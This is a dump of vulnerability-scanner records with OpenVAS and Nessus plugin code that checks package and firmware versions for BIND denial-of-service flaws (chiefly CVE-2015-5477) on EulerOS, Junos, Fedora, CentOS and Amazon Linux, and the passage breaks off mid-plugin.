License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1433\");\n script_version(\"2020-01-23T11:45:55+0000\");\n script_cve_id(\"CVE-2014-0591\", \"CVE-2014-8500\", \"CVE-2015-1349\", \"CVE-2015-4620\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\", \"CVE-2016-1285\", \"CVE-2016-1286\", \"CVE-2016-2775\", \"CVE-2016-2776\", \"CVE-2016-8864\", \"CVE-2016-9131\", \"CVE-2017-3136\", \"CVE-2017-3142\", \"CVE-2017-3143\", \"CVE-2017-3145\", \"CVE-2018-5740\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:45:55 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:45:55 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for bind (EulerOS-SA-2019-1433)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1433\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1433\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'bind' package(s) announced via the EulerOS-SA-2019-1433 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet.(CVE-2016-2776)\n\nA denial of service flaw was found in the way BIND processed certain control channel input. A remote attacker able to send a malformed packet to the control channel could use this flaw to cause named to crash.(CVE-2016-1285)\n\nA flaw was found in the way BIND performed DNSSEC validation. An attacker able to make BIND (functioning as a DNS resolver with DNSSEC validation enabled) resolve a name in an attacker-controlled domain could cause named to exit unexpectedly with an assertion failure.(CVE-2015-4620)\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet.(CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND handled queries for NSEC3-signed zones. A remote attacker could use this flaw against an authoritative name server that served NCES3-signed zones by sending a specially crafted query, which, when processed, would cause named to crash.(CVE-2014-0591)\n\nA denial of service flaw was found in the way BIND parsed certain malformed DNSSEC keys. A remote attacker could use this flaw to send a specially crafted DNS query (for example, a query requiring a response from a zone containing a deliberately malformed key) that would cause named functioning as a validating resolver to crash.(CVE-2015-5722)\n\nIt was found that the lightweight resolver protocol implementation in BIND could enter an infinite recursion and crash when asked to resolve a query name which, when combined with a search list entry, exceeds the maximum allowable length. A remote attacker could use this flaw to crash lwresd or named when using the 'lwres' statement in named.conf.(CVE-2016-2775)\n\nA denial of service flaw was found in the way BIND processed certain records with malformed class attributes. A remote attacker could use this flaw to send a query to request a cached record with a malformed class attribute that would cause named functioning as an authoritative or recursive server to crash. Note: This issue affects authoritative servers as well as recursive servers, however authoritative servers are at limited risk if they perform authentication when making recursive queries to resolve addresses for servers ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'bind' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.4~61.1.h2\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-lite\", rpm:\"bind-libs-lite~9.9.4~61.1.h2\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-license\", rpm:\"bind-license~9.9.4~61.1.h2\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4~61.1.h2\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2022-03-27T14:42:56", "description": "According to its self-reported version number, the remote Juniper Junos device is affected by a denial of service vulnerability due to a flaw in ISC BIND when handling queries for TKEY records. An unauthenticated, remote attacker can exploit this, via crafted TKEY queries, to cause an REQUIRE assertion failure and daemon exit.", "cvss3": {"score": null, "vector": null}, "published": "2016-01-22T00:00:00", "type": "nessus", "title": "Juniper Junos TKEY Query Handling DoS (JSA10718)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-04-11T00:00:00", "cpe": ["cpe:/o:juniper:junos"], "id": "JUNIPER_JSA10718.NASL", "href": "https://www.tenable.com/plugins/nessus/88093", "sourceData": "#TRUSTED 6db75db08006fa18ca9e29e181dd1e287efc39692422a6444335a1b6f2503d01d010b02f1e1e7a2561e44dcac984a386406435bc463810893a8415a4efa60eb5ca2a03e9a523a3a800cda1fff4ef2482745aaf947056e032c1f6c217ea0f679f62b2fee2b60aa90d2b878a25148150f89d80c008237d9b37de47e6683dfdd8f99a12f485b89e086fc334974adc38f1e87395ec8793786d6461134dfa6ea95e6870522bd69a1e1f2c639609392b60729eb6989ee01eec8af228b9e2b758a90778f32d527c7ec85af0c163e42f8f472300ef7d8e358baf0a97599b023404590b960ae6b8ed69433fc26e80068e2ee27afff3dc141cf8cb9e8b9ee01e714b3353bfb9ccbd4433a90a0895d907426305a7b98e64b6da5e45705f9b521bbdb4a7c39f7925ac5302167eee3b019eeb69ec1671c1461493d1e055d2608c5a6e851ba19129df94c2ca3ffb934b00a7e310ef513335a50c0040e4c9e79665bd9b849e271b11f83aadd881c64923502c0008ebf973de25ecf4046d7e03f5bca1966bef8bddc56227e4fc746a2e17af05597273237f8281b670a85943a170baec2c8223df59dba54885b34d6acd1d4df5cdc0a63a7e171a924e01db5c595193408bda25cc881a0148aa81fde759095aac823acbfb5427e27e392abddf1e22f14cf3d68f5d9f0e9e92f032fe56e6962d6e78b269f8064265d4ce31a1abdb5d8e33c368aebec6\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88093);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/04/11\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_bugtraq_id(76092);\n script_xref(name:\"JSA\", value:\"JSA10718\");\n script_xref(name:\"EDB-ID\", value:\"37721\");\n script_xref(name:\"EDB-ID\", value:\"37723\");\n\n script_name(english:\"Juniper Junos TKEY Query Handling DoS (JSA10718)\");\n script_summary(english:\"Checks the Junos version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote Juniper\nJunos device is affected by a denial of service vulnerability due to\na flaw in ISC BIND when handling queries for TKEY records. An\nunauthenticated, remote attacker can exploit this, via crafted TKEY\nqueries, to cause an REQUIRE assertion failure and daemon exit.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10718\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant Junos software release referenced in Juniper\nadvisory JSA10718.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/JUNOS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"junos_kb_cmd_func.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\nmodel = get_kb_item_or_exit('Host/Juniper/model');\nfixes = make_array();\n\nfixes['12.1X44'] = '12.1X44-D55';\nfixes['12.1X46'] = '12.1X46-D40'; # or 12.1X46-D45\nfixes['12.1X47'] = '12.1X47-D30';\nfixes['12.3' ] = '12.3R11'; # or 12.3R12\nfixes['12.3X48'] = '12.3X48-D20';\nfixes['12.3X50'] = '12.3X50-D50';\nfixes['13.2' ] = '13.2R9';\nfixes['13.2X51'] = '13.2X51-D40';\nfixes['13.3' ] = '13.3R8';\nfixes['14.1' ] = '14.1R6'; # or 14.1R7\nfixes['14.1X53'] = '14.1X53-D30';\nfixes['14.2' ] = '14.2R5';\nfixes['15.1R' ] = '15.1R5'; # or 15.1R3\nfixes['15.1F' ] = '15.1F3';\nfixes['15.1X49'] = '15.1X49-D30';\nfixes['15.1X53'] = '15.1X53-D20';\nfixes['15.2R' ] = '15.2R1';\n\ncheck_model(model:model, flags:J_SERIES | SRX_SERIES, exit_on_fail:TRUE);\n\nfix = check_junos(ver:ver, fixes:fixes, exit_on_fail:TRUE);\n\nif (fix == \"15.1R5\")\n fix += \" or 15.1R3\";\nif (fix == \"14.1R6\")\n fix += \" or 14.1R7\";\nif (fix == \"12.3R11\")\n fix += \" or 12.3R12\";\nif (fix == \"12.1X46-D40\")\n fix += \" or 12.1X46-D45\";\n\noverride = TRUE;\nbuf = junos_command_kb_item(cmd:\"show configuration | display set\");\nif (buf)\n{\n pattern = \"^set system services dns dns-proxy\";\n if (!junos_check_config(buf:buf, pattern:pattern))\n audit(AUDIT_HOST_NOT, 'affected because proxy-dns settings have not been configured');\n override = FALSE;\n}\n\n\njunos_report(ver:ver, fix:fix, model:model, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:16", "description": "Update to 9.9.7-P2 to fix CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-03T00:00:00", "type": "nessus", "title": "Fedora 22 : bind99-9.9.7-6.P2.fc22 (2015-12316)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bind99", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-12316.NASL", "href": "https://www.tenable.com/plugins/nessus/85169", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-12316.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85169);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"FEDORA\", value:\"2015-12316\");\n\n script_name(english:\"Fedora 22 : bind99-9.9.7-6.P2.fc22 (2015-12316)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 9.9.7-P2 to fix CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1247361\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163015.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45265ef6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind99 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind99\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"bind99-9.9.7-6.P2.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind99\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:28", "description": "Updated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "CentOS 5 : bind (CESA-2015:1514)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bind", "p-cpe:/a:centos:centos:bind-chroot", "p-cpe:/a:centos:centos:bind-devel", "p-cpe:/a:centos:centos:bind-libbind-devel", "p-cpe:/a:centos:centos:bind-libs", "p-cpe:/a:centos:centos:bind-sdb", "p-cpe:/a:centos:centos:bind-utils", "p-cpe:/a:centos:centos:caching-nameserver", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2015-1514.NASL", "href": "https://www.tenable.com/plugins/nessus/85048", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1514 and \n# CentOS Errata and Security Advisory 2015:1514 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85048);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1514\");\n\n script_name(english:\"CentOS 5 : bind (CESA-2015:1514)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-July/021270.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4fb19e40\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5477\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-libbind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-libs-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind-utils-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-devel / bind-libbind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:29", "description": "As reported upstream, an error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : bind (ALAS-2015-573)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-12-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:bind", "p-cpe:/a:amazon:linux:bind-chroot", "p-cpe:/a:amazon:linux:bind-debuginfo", "p-cpe:/a:amazon:linux:bind-devel", "p-cpe:/a:amazon:linux:bind-libs", "p-cpe:/a:amazon:linux:bind-sdb", "p-cpe:/a:amazon:linux:bind-utils", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-573.NASL", "href": "https://www.tenable.com/plugins/nessus/85044", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-573.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85044);\n script_version(\"2.10\");\n script_cvs_date(\"Date: 2018/12/18 10:18:58\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"ALAS\", value:\"2015-573\");\n\n script_name(english:\"Amazon Linux AMI : bind (ALAS-2015-573)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"As reported upstream, an error in the handling of TKEY queries can be\nexploited by an attacker for use as a denial-of-service vector, as a\nconstructed packet can use the defect to trigger a REQUIRE assertion\nfailure, causing BIND to exit.\"\n );\n # https://kb.isc.org/article/AA-01272/0\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-573.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update bind' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif 